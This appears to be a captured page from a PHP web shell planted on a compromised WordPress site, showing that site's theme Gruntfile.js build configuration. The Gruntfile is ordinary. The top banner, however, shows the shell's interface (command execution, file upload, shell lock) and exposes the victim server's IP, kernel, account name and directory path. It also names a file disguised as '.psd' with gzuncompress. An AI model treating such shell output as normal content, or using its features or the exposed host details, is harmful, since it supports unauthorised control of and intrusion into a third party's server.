hyun.psd; gzuncompress
|
Server IP : 173.236.192.202 / Your IP : 216.73.216.85 Web Server : Apache System : Linux iad1-shared-e1-03 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64 User : andfor18 ( 14551322) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/andfor18/mbssigns.com/wp-content/themes/multinews/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] | [ Lock Shell ] | [ Logout ] |
|---|
module.exports = function(grunt) {
// Project configuration.
grunt.initConfig({
pkg: grunt.file.readJSON('package.json'),
/*
concat: {
dist: {
src: [
'js/all/*.js',
],
dest: 'js/plugins.js',
}
},
*/
uglify: {
build: {
src: 'js/plugins.js',
dest: 'js/plugins.min.js',
}
},
concat: {
dist: {
src: [
'css/all/*.css',
],
dest: 'css/plugins.css',
}
},
'cssmin': {
'dist': {
/* Plugins */
'src': ['css/plugins.css'],
'dest': 'css/plugins.min.css'
}
},
});
// Load the plugin that provides the "uglify" task.
grunt.loadNpmTasks('grunt-contrib-concat');
grunt.loadNpmTasks('grunt-contrib-uglify');
grunt.loadNpmTasks('grunt-yui-compressor');
grunt.loadNpmTasks('grunt-sync');
grunt.loadNpmTasks('grunt-contrib-copy');
// Default task(s).
grunt.registerTask('default', ['uglify']);
grunt.registerTask('js', ['concat', 'uglify']);
grunt.registerTask('css', ['concat', 'cssmin']);
};